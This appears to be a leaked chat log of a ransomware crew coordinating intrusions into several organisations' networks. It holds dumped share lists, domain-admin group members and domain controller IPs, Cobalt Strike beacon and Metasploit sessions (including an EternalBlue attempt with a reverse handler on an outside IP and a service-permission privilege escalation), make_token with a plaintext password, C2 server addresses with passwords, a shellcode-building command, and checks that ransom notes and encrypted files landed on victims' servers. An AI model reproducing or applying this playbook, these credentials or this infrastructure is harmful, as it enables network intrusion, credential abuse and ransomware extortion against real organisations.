\\USCHI-NWA001.Hobbes.loc\Netwrix_UAVR$ - This share contains audit data on user activity collected by Netwrix Auditor. \\USCHI-NWA001.Hobbes.loc\print$ - Printer Drivers \\LT-000108.Hobbes.loc\ADMIN$ - Remote Admin \\LT-000108.Hobbes.loc\C$ - Default share \\LT-000108.Hobbes.loc\IPC$ - Remote IPC \\USCHI-VHH010.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-VHH010.Hobbes.loc\C$ - Default share \\USCHI-VHH010.Hobbes.loc\E$ - Default share \\USCHI-VHH010.Hobbes.loc\IPC$ - Remote IPC \\PCHIDCG003.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIDCG003.Hobbes.loc\C$ - Default share \\PCHIDCG003.Hobbes.loc\IPC$ - Remote IPC \\PCHIDCG003.Hobbes.loc\NETLOGON - Logon server share \\PCHIDCG003.Hobbes.loc\slETL$ - \\PCHIDCG003.Hobbes.loc\SYSVOL - Logon server share \\PCHIAPG011.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIAPG011.Hobbes.loc\C$ - Default share \\PCHIAPG011.Hobbes.loc\IPC$ - Remote IPC \\PCHIAPG011.Hobbes.loc\Lenel$ - \\USCHI-PWA001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-PWA001.Hobbes.loc\C$ - Default share \\USCHI-PWA001.Hobbes.loc\E$ - Default share \\USCHI-PWA001.Hobbes.loc\F$ - Default share \\USCHI-PWA001.Hobbes.loc\G$ - Default share \\USCHI-PWA001.Hobbes.loc\H$ - Default share \\USCHI-PWA001.Hobbes.loc\IPC$ - Remote IPC \\DAG01.Hobbes.loc\ClusterStorage$ - Cluster Shared Volumes Default Share \\DAG01.Hobbes.loc\IPC$ - Remote IPC \\DT-000033.Hobbes.loc\A$ - Default share \\DT-000033.Hobbes.loc\ADMIN$ - Remote Admin \\DT-000033.Hobbes.loc\C$ - Default share \\DT-000033.Hobbes.loc\IPC$ - Remote IPC \\SQL0005.Hobbes.loc\ActiveInk - \\SQL0005.Hobbes.loc\ADMIN$ - Remote Admin \\SQL0005.Hobbes.loc\C$ - Default share \\SQL0005.Hobbes.loc\E$ - Default share \\SQL0005.Hobbes.loc\F$ - Default share \\SQL0005.Hobbes.loc\G$ - Default share \\SQL0005.Hobbes.loc\IPC$ - Remote IPC \\SQL0005.Hobbes.loc\Temp - \\USCHI-WSUS001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-WSUS001.Hobbes.loc\C$ - Default share \\USCHI-WSUS001.Hobbes.loc\E$ - Default share \\USCHI-WSUS001.Hobbes.loc\IPC$ - Remote 
IPC \\USCHI-WSUS001.Hobbes.loc\UpdateServicesPackages - A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system. \\USCHI-WSUS001.Hobbes.loc\WsusContent - A network share to be used by Local Publishing to place published content on this WSUS system. \\USCHI-WSUS001.Hobbes.loc\WSUSTemp - A network share used by Local Publishing from a Remote WSUS Console Instance. \\USCHI-NET002.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-NET002.Hobbes.loc\AdminUIContentPayload - AdminUIContentPayload share for AdminUIContent Packages \\USCHI-NET002.Hobbes.loc\C$ - Default share \\USCHI-NET002.Hobbes.loc\Client - \\USCHI-NET002.Hobbes.loc\D - \\USCHI-NET002.Hobbes.loc\DeploymentShare$ - MDT Deployment Share \\USCHI-NET002.Hobbes.loc\Drivers - \\USCHI-NET002.Hobbes.loc\E$ - Default share \\USCHI-NET002.Hobbes.loc\EasySetupPayload - EasySetupPayload share for EasySetup Packages \\USCHI-NET002.Hobbes.loc\F - \\USCHI-NET002.Hobbes.loc\F$ - Default share \\USCHI-NET002.Hobbes.loc\ImagesFiles - \\USCHI-NET002.Hobbes.loc\IPC$ - Remote IPC \\USCHI-NET002.Hobbes.loc\print$ - Printer Drivers \\USCHI-NET002.Hobbes.loc\REMINST - RemoteInstallation \\USCHI-NET002.Hobbes.loc\SCCMContentLib$ - 'Configuration Manager' Content Library for site CHI (3/6/2015) \\USCHI-NET002.Hobbes.loc\SMPSTOREF_63F684E9$ - SMS SMP Share \\USCHI-NET002.Hobbes.loc\SMSPKGF$ - SMS Site CHI DP 3/6/2015 \\USCHI-NET002.Hobbes.loc\SMSSIG$ - SMS Site CHI DP 3/6/2015 \\USCHI-NET002.Hobbes.loc\SMS_CHI - SMS Site CHI 09/21/20 \\USCHI-NET002.Hobbes.loc\SMS_CPSC$ - SMS Compressed Package Storage \\USCHI-NET002.Hobbes.loc\SMS_DP$ - ConfigMgr Site Server DP share \\USCHI-NET002.Hobbes.loc\SMS_OCM_DATACACHE - OCM inbox directory \\USCHI-NET002.Hobbes.loc\SMS_SITE - SMS Site CHI 09/21/20 \\USCHI-NET002.Hobbes.loc\SMS_SUIAgent - SMS Software Update Installation Agent -- 09/21/20 \\USCHI-NET002.Hobbes.loc\SourceFiles - \\USCHI-BKP110.Hobbes.loc\ADMIN$ - Remote 
Admin \\USCHI-BKP110.Hobbes.loc\C$ - Default share \\USCHI-BKP110.Hobbes.loc\E$ - Default share \\USCHI-BKP110.Hobbes.loc\F$ - Default share \\USCHI-BKP110.Hobbes.loc\G$ - Default share \\USCHI-BKP110.Hobbes.loc\IPC$ - Remote IPC \\USCHI-BKP110.Hobbes.loc\VBRCatalog - \\USCHI-CAS001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-CAS001.Hobbes.loc\C$ - Default share \\USCHI-CAS001.Hobbes.loc\CertEnroll - Active Directory Certificate Services share \\USCHI-CAS001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-SBS001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-SBS001.Hobbes.loc\C$ - Default share \\USCHI-SBS001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-SBS001.Hobbes.loc\SkypeShare - \\USCHI-SBS001.Hobbes.loc\SkypeShare1 - \\USCHI-SBS001.Hobbes.loc\Users - \\USCHI-SBS001.Hobbes.loc\xds-replica - Share used for Skype for Business Server replication \\USCHI-SBS002.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-SBS002.Hobbes.loc\C$ - Default share \\USCHI-SBS002.Hobbes.loc\IPC$ - Remote IPC \\USCHI-EM-LT400.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-EM-LT400.Hobbes.loc\C$ - Default share \\USCHI-EM-LT400.Hobbes.loc\IPC$ - Remote IPC \\DT-000025.Hobbes.loc\A$ - Default share \\DT-000025.Hobbes.loc\ADMIN$ - Remote Admin \\DT-000025.Hobbes.loc\C$ - Default share \\DT-000025.Hobbes.loc\IPC$ - Remote IPC \\DT-000025.Hobbes.loc\print$ - Printer Drivers \\USCHI-SBS003.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-SBS003.Hobbes.loc\C$ - Default share \\USCHI-SBS003.Hobbes.loc\IPC$ - Remote IPC \\USCHI-SBS003.Hobbes.loc\print$ - Printer Drivers

```
Alias name     Administrators
Comment

Members
-------------------------------------------------------------------------------
Administrator
HOBBES\AdamsK
HOBBES\Domain Admins
HOBBES\SUPPORT
HOBBES\IT-WKSTN-SUPP
HOBBES\PCADMIN
```

chat room
chat room
@tl1

```
Group name     Enterprise Admins
Comment        Designated administrators of the enterprise

Members
-------------------------------------------------------------------------------
DILBERT  MS-0001  RAMIREZJ  SPS19-Admin  SPS-DB-2019  SPS-TS-2019  SVC-NWA001
```

```
Domain Controllers:
Server Name    IP Address
-----------    ----------
PCHIDCG003     10.20.32.100
PCHIDCG004     10.20.32.28
USCHI-DCP001   10.20.32.175
USCHA-DCG002   10.6.0.56
USCHI-DCG003   10.20.32.103
USCHI-DCG001   10.20.32.101
PCHIDCG002     10.111.2.20
```

```
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
DILBERT  ePOScan  Exchange Service  LaiP  MITORATJ  MS-0001  PCHIAPG009  PCHIAPG014  PCHIDBG001  RAMIREZJ  SAVDeploy  SCCMadmin  SCOMaction  SLADMIN  SPS19-Admin  SPS-DB-2019  SPS-TS-2019  SQL0005  SVC-CAS  SVC-ESRI  SVC-NWA001  SVC-PW-DBG001  SVC-PWORCHFWK  SVC-PW-ORCHFWK  SVC-PWPWD001  SVC-Veeam  TAGGESE  TENGSERV  UREJA  USCHIPWA001  USCHIPWD001  USCHIPWW001
```

AdFind
go
chat room
expFederal.com
and also without a domain
yep
another session came in for you there, even with LA on all of them
you know the rules
send me logins in a DM for the shellcode builder admin panel
there's one more session in the entry one
then we look for a VPN
the domain is unavailable
alive
I have another session hanging in cob
who pulled the AD info?

```
meterpreter > getsystem
[2001: Operation failed: Access is denied. The following was attempted:
[Named Pipe Impersonation (In Memory/Admin)
[Named Pipe Impersonation (Dropper/Admin)
[Token Duplication (In Memory/Admin)
[Named Pipe Impersonation (RPCSS variant)
meterpreter >
[*] 10.0.0.115 - Meterpreter session 7 closed.
Reason: Died
```

it dropped
I was working from the entry one
although my domain pings from there
these sessions don't come to my cob
and give me the domain
pull AD users
+
as I see it, he passed it to himself
take that network from cob into work together with @user3
well, elevating with an exploit will work, but bypassing UAC won't
via elevate @user7 once managed to escalate without being LA
who knows
that's clear
I tried a bunch of bypassuac's, they all complain like this:
when the current user isn't in the local admin group there's no point trying to bypass UAC
+

```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
```

the domain still doesn't resolve?
Lots of different creds
http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx
Win Serv 2008
All users whose creds we have are on one machine
No LA among them
Domain doesn't respond
No VPN configs
No shares
No creds in txt etc.
Not vulnerable to MS17:

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 173.234.155.45:9875
[192.168.1.190:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[192.168.1.190:445 - Scanned 1 of 1 hosts (100% complete)
[192.168.1.190:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
```

Forwarded it into meterpreter via multi/handler:
`getsystem` - miss
I tried a bunch of bypassuac's, they all complain like this:
`Not in admins group, cannot escalate with this module`
Or like this:
`not-vulnerable: Target is not vulnerable`
Tried this (This module attempts to exploit existing administrative privileges to obtain a SYSTEM session)
Also didn't help much:

```
msf6 exploit(windows/local/service_permissions) > exploit

[*] Trying to add a new service...
[*] Trying to find weak permissions in existing services..
[*] [CitrixICAFileSigningService] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\DeliveryServices\ICAFileSigningService\Citrix.DeliveryServices.ICASign.ServiceHost.exe"
[*] [Citrix_GTLicensingProv] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\Licensing\LicWMI\Citrix_GTLicensingProv.exe"
[+] [HipsDaemon] Write access to C:\Program Files (x86)\Huorong\Sysdiag\bin\HipsDaemon.exe
[+] [knbcenter] Write access to D:\Program Files (x86)\liebao\6.5.115.18480\KNBCenter.exe
[*] [TermServLicensing] Cannot reliably determine path: C:\Windows\system32\svchost -k TSLicensing
```

the boss won't appreciate this
I was talking about logins, passwords, names, comments, files
nope
You talked about logins, there was no talk of passwords
will there be more?
damn, how many times have I said it?
take it into work
3 sessions
there's 1 network
yes
@tl1 are we going through the sessions?
Password change: passwd

```
23.106.160.50 p17464 pwd:Lukashenko228!
```

for now we continue working on the old tasks
ok so, there are problems with cob
Better do the next ones on CentOS
all good, figured it out
You need to do this every time you log in via ssh
specify `/usr/bin/bash` as the shell
Of course
you'll get the home dir automatically

```
useradd -m username --shell "shell path" && passwd username
```

did you set the pass?
make yourselves lists for now
damn.... Are you serious... Of course I tried before writing, and when you specify it explicitly you need to write it together with the user.
just the name of the home dir, it gets created in /home by itself
when you specify the directory you don't need to write the full path
could use CentOS or a clean Deb, this crap doesn't happen there
I don't understand what's up with the vds
I create the user with the directory explicitly specified: useradd -m -d /home/user3
From
I log in in a new terminal and see this

```
 * Ubuntu 20.04 LTS is out, raising the bar on performance, security,
   and optimisation for Intel, AMD, Nvidia, ARM64 and Z15 as well as
   AWS, Azure and Google Cloud.

     https://ubuntu.com/blog/ubuntu-20-04-lts-arrives

0 updates can be installed immediately.
0 of these updates are security updates.

$ ды
-sh: 1: ды: not found
$ ls
$
```

I specify it like this: mkhomedir_helper user3. Also doesn't help.
I check: cat /etc/passwd

```
user3:x:1000::/home/user3:/bin/sh
```

waiting for sessions, sorting them out, working
cob

```
206.221.186.34:44482 pqtbjTVtIMYBudInFs7VVoZDHjDvqtAR1v
```

we put the current ones aside, except @user4
so we move on
okay
so it doesn't get lost
maybe a separate channel for feedback?
for additional modules: link + reason/description
Need to make it so kerb tickets are collected with commands, smb auto-brute works out of the box, there's a way to upload files, adfind is pulled with one command, DA, LA and the other such stuff is output with one command. That's the minimum
PowerView.ps1
what preview?
more specifically, links to git and so on
something that will raise privileges
well, at the very least build powerview in there by default
links and whatever else is necessary
mostly bugs, okay
++No way to download files from the client PC; in ptsh it downloads (Download Files is visible), but it doesn't download from there (a new tab opens - server not found). I'd like to import scripts directly from the PC into ptsh, not via a link. Problems with sockets - two or three sessions come in. You work in one session, type a command, and it gets duplicated two or three times, as many times as sessions came in
the built-in toolset could be richer...
well, in cob that's many times rarer
hardly a complaint about the tool, cob under crappy conditions also often dies or doesn't call back)
sessions die very often, which is a minus))))
there's a files button there too ....
mm
actually it's blue
yes, I couldn't find it either until I was told it's there
the buttons are visible
bug
about the bar at the top?
nothing more to say
I'd like a proper panel, not a white rectangle; otherwise I tried to avoid using it and moved the session to cob
@all everyone who used tpsh, write your user experience here in one big message, please. separate + and -, what's fine etc., what you'd want. what's superfluous. give feedback
write the status in the chat room right away
ok
yes
I checked them yesterday, repeat?
for presence of the note + availability
for what?
check all the sisd.net servers
me, probably..
who's freer right now?
I'll set it up for msf
deploy arma there for yourselves and work together
today you'll have to put up with it
One for everyone is not an option. The whole subnet gets pulled into arma if you scan. + it'll be a pain to work in arma and msf at the same time
well, you've gained experience since then, so you can try again)
I don't remember anymore, originally we had one for everyone. and there was something about working in turns
conflict in what?
well, it seems it'll conflict if it's for a crowd
but the old one dropped too, so for now it's one for everyone
no.
for everyone who needs one, as a replacement for the old one
you mean this is for one person?
don't forget to delete your inactive sessions after yourselves

```
23.106.160.50:17464 HJ6Hmf7KNP3w2w7HCtprxRHGg6q92E9LsvWLv98y
```

I'll post the access details here, let one person set it up
the VPS for msf has arrived
I'll send you the x86 dll
strange
yes
and your pl is x64?
`./shellConcatination --source=shellStarter_llvm_x64.dll -keep -self --target=pl64.dll --addBin=pl.bin` that's how I built it, x64 payload
check
check the system bitness
like x86?
how did you build and run it?
if everything had gone successfully, domain authentication should have died
why?
bad(

```
beacon> ls \\admindc1\c$
[*] Tasked beacon to list files in \\admindc1\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc1\c$\
 Size Type Last Modified Name ---- ---- ------------- ---- dir 07/10/2020 08:19:50 $Recycle.Bin dir 12/08/2020 23:30:15 AdminDC1 dir 12/08/2020 23:30:15 batch dir 12/08/2020 23:30:15 ck-agent dir 10/26/2018 09:36:07 Documents and Settings dir 12/08/2020 23:30:15 inetpub dir 12/08/2020 23:30:16 Logs dir 12/09/2020 12:27:52 MSI dir 10/26/2018 13:40:56 PerfLogs dir 12/08/2020 23:30:16 Program Files dir 12/09/2020 02:24:43 Program Files (x86) dir 12/08/2020 23:30:16 ProgramData dir 12/08/2020 23:30:16 Recovery dir 12/08/2020 23:30:10 System Volume Information dir 10/12/2020 15:18:46 temp dir 12/08/2020 23:30:16 Users dir 12/02/2020 03:33:28 Windows dir 12/08/2020 23:30:16 Zabbix_Agent 1kb fil 12/08/2020 23:30:15 AdminDC1.admin.sisd.k12_admindc1(8).req.HWOEU 1kb file 12/08/2020 23:30:15 admindc1.cer.HWOEU 375kb file 07/16/2016 07:18:08 bootmgr 535b thread 12/08/2020 23:30:15 BOOTNXT.HWOEU 16gb file 11/13/2020 07:53:40 pagefile.sys 1kb file 12/08/2020 23:30:15 readme.txt 40mb file 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\admindc2\c$
[*] Tasked beacon to list files in \\admindc2\c$
[+] host called home, sent: 31 bytes
[-] could not open \\admindc2\c$\*: 53

beacon> ls \\admindc3\c$
[*] Tasked beacon to list files in \\admindc3\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc3\c$\
 Size Type Last Modified Name ---- ---- ------------- ---- dir 07/28/2019 07:12:07 $Recycle.Bin dir 12/08/2020 23:32:07 ck-agent dir 12/09/2020 02:39:28 Config.Msi dir 10/26/2018 15:02:45 Documents and Settings dir 12/08/2020 23:32:08 Logs dir 10/29/2018 14:52:44 PerfLogs dir 12/08/2020 23:32:08 Program Files dir 12/09/2020 02:39:18 Program Files (x86) dir 12/08/2020 23:32:08 ProgramData dir 12/08/2020 23:32:08 Recovery dir 12/08/2020 21:50:51 System Volume Information dir 12/08/2020 23:32:08 Users dir 12/02/2020 03:45:13 Windows dir 12/08/2020 23:32:08 Zabbix_Agent 375kb file 07/16/2016 07:18:08 bootmgr 535b file 12/08/2020 23:32:07 BOOTNXT.HWOEU 16gb file 11/13/2020 16:25:59 pagefile.sys 1kb file 12/08/2020 23:32:07 readme.txt 40mb file 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\admindc4\c$
[*] Tasked beacon to list files in \\admindc4\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc4\c$\
 Size Type Last Modified Name ---- ---- ------------- ---- dir 07/11/2019 13:34:37 $Recycle.Bin dir 12/08/2020 23:32:33 ck-agent dir 10/29/2018 09:10:11 Documents and Settings dir 12/08/2020 23:32:35 Logs dir 10/29/2018 13:19:55 PerfLogs dir 12/08/2020 23:32:35 Program Files dir 12/09/2020 02:41:13 Program Files (x86) dir 12/08/2020 23:32:35 ProgramData dir 12/08/2020 23:32:35 Recovery dir 12/08/2020 23:32:28 System Volume Information dir 12/08/2020 23:32:35 Users dir 11/17/2020 13:36:48 Windows dir 12/08/2020 23:32:35 Zabbix_Agent 375kb file 07/16/2016 07:18:08 bootmgr 535b file 12/08/2020 23:32:33 BOOTNXT.HWOEU 16gb file 11/17/2020 13:46:41 pagefile.sys 1kb file 12/08/2020 23:32:33 readme.txt 40mb file 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\admindc5\c$
[*] Tasked beacon to list files in \\admindc5\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc5\c$\
 Size Type Last Modified Name ---- ---- ------------- ---- dir 07/11/2019 13:42:13 $Recycle.Bin dir 12/08/2020 20:24:33 $SNAP_2020120302_VOLUMEC$ dir 12/08/2020 20:24:33 AdminDC1 dir 12/08/2020 20:24:33 ck-agent dir 10/29/2018 09:48:27 Documents and Settings dir 12/08/2020 20:24:33 iboss-ad-installers-110818 dir 12/08/2020 20:24:35 Logs dir 10/29/2018 14:45:30 PerfLogs dir 12/08/2020 20:24:35 Program Files dir 12/09/2020 02:48:53 Program Files (x86) dir 12/08/2020 20:24:35 ProgramData dir 12/08/2020 20:24:36 Recovery dir 12/08/2020 20:24:28 System Volume Information dir 12/08/2020 20:24:36 Users dir 12/02/2020 02:48:40 Windows dir 12/08/2020 20:25:25 Zabbix_Agent 375kb file 07/16/2016 07:18:08 bootmgr 535b file 12/08/2020 20:24:33 BOOTNXT.HWOEU 16gb file 11/13/2018 11:25:20 pagefile.sys 1kb file 12/08/2020 20:24:33 readme.txt
```

pull the list of DCs, check them
I'm on azuredc right now
is the DC available?

```
beacon> ls \\dhcp02\c$
[*] Tasked beacon to list files in \\dhcp02\c$
[+] host called home, sent: 29 bytes
[*] Listing: \\dhcp02\c$\
 Size Type Last Modified Name ---- ---- ------------- ---- dir 04/22/2016 01:52:17 $Recycle.Bin dir 12/08/2020 23:09:27 clu dir 12/08/2020 23:09:27 compaq dir 12/09/2020 11:37:37 Config.Msi dir 12/08/2020 23:09:27 cpqsystem dir 08/22/2013 08:48:41 Documents and Settings dir 12/08/2020 23:09:27 hp dir 08/22/2013 09:52:33 PerfLogs dir 12/08/2020 23:09:27 Program Files dir 12/09/2020 02:49:13 Program Files (x86) dir 12/09/2020 12:55:15 ProgramData dir 12/08/2020 23:09:22 System Volume Information dir 12/08/2020 23:09:27 Users dir 09/21/2020 10:12:03 Windows dir 12/08/2020 23:09:27 zabbix_agent 389kb file 09/30/2013 15:37:02 bootmgr 535b file 12/08/2020 23:09:27 BOOTNXT.HWOEU 5kb file 12/08/2020 23:09:27 cpqsprt.trace.HWOEU 3gb file 06/01/2020 10:32:41 pagefile.sys 23kb file 12/08/2020 23:09:27 PHH_wirless2.txt.HWOEU 1kb file 12/08/2020 23:09:27 readme.txt 40mb file 12/09/2020 08:06:26 redcloak.msi 3kb file 12/08/2020 23:09:27 smh_installer.log.HWOEU 615b file 12/08/2020 23:09:27 zabbix_agentd.log.HWOEU

beacon> ls \\kms\c$
[*] Tasked beacon to list files in \\kms\c$
[+] host called home, sent: 26 bytes
[*] Listing: \\kms\c$\
 Size Type Last Modified Name ---- ---- ------------- ---- dir 09/15/2018 01:19:00 $Recycle.Bin dir 03/30/2020 09:58:18 Documents and Settings dir 05/29/2020 10:17:56 PerfLogs dir 12/08/2020 20:58:12 Program Files dir 12/08/2020 20:58:12 Program Files (x86) dir 12/08/2020 20:58:12 ProgramData dir 12/08/2020 20:58:12 Recovery dir 12/08/2020 20:58:07 System Volume Information dir 12/08/2020 20:58:12 Users dir 05/29/2020 10:17:57 Windows 1gb file 05/29/2020 10:18:36 pagefile.sys 1kb file 12/08/2020 20:58:12 readme.txt

beacon> ls \\hyperv24\c$
[*] Tasked beacon to list files in \\hyperv24\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\hyperv24\c$\
 Size Type Last Modified Name ---- ---- ------------- ---- dir 12/08/2020 22:10:00 Avamar dir 11/06/2020 08:02:07 ClusterStorage dir 11/05/2020 16:57:08 Documents and Settings dir 11/06/2020 07:32:25 PerfLogs dir 12/08/2020 22:10:00 Program Files dir 12/09/2020 09:05:16 Program Files (x86) dir 12/08/2020 22:10:00 ProgramData dir 12/08/2020 22:10:00 Recovery dir 12/08/2020 22:09:56 System Volume Information dir 12/09/2020 09:04:58 Users dir 11/06/2020 07:55:21 Windows dir 12/08/2020 22:10:00 Zabbix_Agent 839b fil 12/08/2020 22:10:00 NWT_hotfix_report.html.HWOEU 526kb file 12/08/2020 22:10:00 NWT_Install.log.HWOEU 384kb file 12/08/2020 22:10:00 NWT_Nimble_DSM_Install.log.HWOEU 19gb file 11/06/2020 07:57:46 pagefile.sys 1kb file 12/08/2020 22:10:00 readme.txt 40mb file 12/09/2020 08:06:26 redcloak.msi
```

checked 3, the readme is everywhere
and check something neighbouring under DA creds
ok)
everyone
everyone, or those who are stuck on the current ones?
it's been a while since we had this format)
you have about 1.5 hours left to work on the current ones, then I'll hand out cob access and from there we'll sort things into work again

```
 Size Type Last Modified Name ---- ---- ------------- ---- dir 10/09/2020 09:34:10 $Recycle.Bin dir 07/10/2020 13:27:44 Documents and Settings dir 12/08/2020 23:33:21 Packages dir 07/10/2020 12:14:14 PerfLogs dir 12/08/2020 23:33:21 Program Files dir 12/09/2020 
08:44:13 Program Files (x86) dir 12/08/2020 23:33:21 ProgramData dir 12/08/2020 23:33:21 Recovery dir 12/08/2020 23:33:16 System Volume Information dir 12/08/2020 23:33:21 Users dir 07/21/2020 11:40:36 Windows dir 07/2020 14:24:04 WindowsAzure 380kb file 11/21/2016 00:36:43 bootmgr 535b file 12/08/2020 23:33:21 BOOTNXT.HWOEU 1kb file 12/08/2020 23:33:21 readme.txt ```ридми есть[ ](https://mediaeveryone.com/channel/general?msg=yaydbDsTYtNmBckJn) а проверь корень диска Снету у меня, вообще всё пусто, очистил недавно кобуоднаа у вас в sisd много живых сессий?судя по китайской cmd далеко трафик летит)у сесси кста при слипе 5 отклик минутане пробовалвсе мимо или не пробовал?-помимо мс17?ща попробую посканить этот комп на мс17>никто из них неЛА, кредов нетгде?я ж написала по лпе направлению что?[ ](https://mediaeveryone.com/channel/general?msg=7i8e3ue3CvTy5Mhti) в общем здесь все пользователи на одном компе, никто из них не ЛА, домен не отзывается, конфигов впн нет, шар нет, кредов нетпока нетВопрос - можно кобу почистить от sisd.net сессий?[ ](https://mediaeveryone.com/channel/general?msg=zfdbDky5Ae6mwQgxR) окте кто просил впс под мсф - во второй половине дняесли вопросов нет, то приступаем к работедень добрыйВсем приветhiокей)несколько рандомных проверил - даридми появился на армах?``` Сервера Всего серверов по ад - 69 Живых - 50 Закрыто - 47 (нет дисков, шар,3389) Сфера - снапшоты потерты Армы Всего по ад - 322 Живых - 140 Закрыто - 118 ```положите финальную стату последним сообщениема на армах кст появилась)1.done.korbel.com@tl1 закрывай тут всену и ладно что могли - сделалида добито уже все)да думаю все добивайте если что живое осталось и ДКумерла сеть скорее всегопо ls до того как отвались - везде была записка`` Teemo[COLODC1]daniel.harvey_adm */3192|20Dec23 05:03:27> make_token KORBEL\ben.mandeville 1234qwerASDF!@#$ [*] Tasked beacon to create a token for KORBEL\ben.mandeville [+] host called home, sent: 56 bytes [+] Impersonated KORBEL\daniel.harvey_adm 
Teemo[COLODC1]daniel.harvey_adm */3192|20Dec23 05:03:34> ls \\10.10.13.14\C$ [*] Tasked beacon to list files in \\10.10.13.14\C$ [+] host called home, sent: 34 bytes [-] could not open \\10.10.13.14\C$\*: 53 ``на крайняк псек)на всякий случай чекда неттам рпс не доступен, вмик же тоже не будет работатьа вмик?)ну вот это и не рабоает)tasklist /v /s hostipвисит лиа, я думал процесdirls простону ты же под токеном видишь все дискиlsа как проверять то?) вмик не работаетчтобы по сети добралось доступных шарда и думаю можно запускать с ДК тоже под контекстом ЖИВОГО домен админану тогда перепроверяйте сервера где "встало" где нет )я рандомные пинганул - все доступны))спать хочешь уже?)shell ping 10.10.1.24 -n 1`` beacon> shell ping -n 10.10.1.24 [*] Tasked beacon to run: ping -n 10.10.1.24 [+] host called home, sent: 49 bytes [+] received output: IP address must be specified. ```сделайте репинг по серверам например глянуть че к чемуну посмотрите с ДК где живые тачки осталисьтам и дк живой естьне есть виаем сессии на серверах живыеили кобу вышибло)либо рубанули траффик на кобальт этота все) они отключили сеть походу)echo 1 > Z:\test.txt?а и да, перепроверте все сервера где сесии умерли быстрокак будто не доступен для записи под контекстом не понимаюдоступ к контекнту же естьно почему-то анэвэйлбл виситтак значит доступенотработакстати, а dir Z:\ отработает?с прямым указанием кред?он отвалится?ремапните 1и то верно :thinking:``` ls \\10.10.1.181\c$ [*] Tasked beacon to list files in \\10.10.1.181\c$ [+] host called home, sent: 34 bytes [*] Listing: \\10.10.1.181\c$\ Size Type Last Modified Name ---- ---- ------------- ---- dir 10/20/20 14:28:47 $Recycle.B ``а как был запрос тогда сейчас?)может потому что после шифровки дк поломалась авторизация и токен слетел?`` beacon> shell net use [*] Tasked beacon to run: net use [+] host called home, sent: 38 bytes [+] received output: New connections will be remembered. 
Status Local Remote Network ------------------------------------------------------------------------------- Unavailable Y: \\10.10.1.181\c$ Microsoft Windows Network Unavailable Z: \\10.10.15.10\c$ Microsoft Windows Network The command completed successfully. beacon> ls \\10.10.1.181\c$ [*] Tasked beacon to list files in \\10.10.1.181\c$ [+] host called home, sent: 34 bytes [*] Listing: \\10.10.1.181\c$\ Size Type Last Modified Name ---- ---- ------------- ---- dir 10/20/20 14:28:47 $Recycle.Bin dir 10/20/2020 20:38:31 Documents and Settings dir 12/16/2020 12:05:24 inetpub dir 10/20/2020 15:46:32 PerfLogs dir 11/30/2020 13:30:25 Program Files dir 11/30/2020 13:30:26 Program Files (x86) dir 12/22/2020 12:41:05 ProgramData dir 10/20/2020 20:38:33 Recovery dir 11/17/2020 15:49:30 SFTP_Root dir 10/20/2020 14:04:21 System Volume Information dir 10/29/2020 16:00:15 Users dir 11/30/2020 13:21:42 Windows 380kb file 02/02/2018 10:37:03 bootmgr 1b file 07/16/2016 06:18:08 BOOTNXT 2gb file 12/21/2020 13:05:39 pagefile.sys ```а хост доступен вообще?как будто под другим контекстом маунтилисьони почему-то unavailable висят[ ](https://mediaeveryone.com/group/korbel-com?msg=jdyKZby3gt8qryYk9) я про серваки если вдругтак мб не дошло до туда еще?оба без запискиZ / Yна него примаплено 2 дискапосмотрите на хосте SQLчет мимо как-будтовот только замапленные дискихмбэкапы насы?сам проверил везде ls C:\дапроверили ридми?притянули сервера, замапили армы, сделали dllinjectда все ок??т е вы раскидали, замапили и запустили?все еще пранкуете по анричбл)а ну окей да они анричбл простода4.2 ?не подтянулись ``` 10.10.1.61 - 10.10.1.6 - 10.10.1.60 - ```[ ](https://mediaeveryone.com/group/korbel-com?msg=PyBQTPoGEaL2NFYJj) кобана этом 10.10.1.60 портскан даже не выдаёт, что он живойпосмотрю кое чекиньте доступ в кобальт и дайте айпишники этих 3 серваков которые не притягиваюся и не имеют портов пожалуйстаа 445 135 139 какие то открыты там?да, это kb-temperature.korbel.com ``` >operatingSystem: 
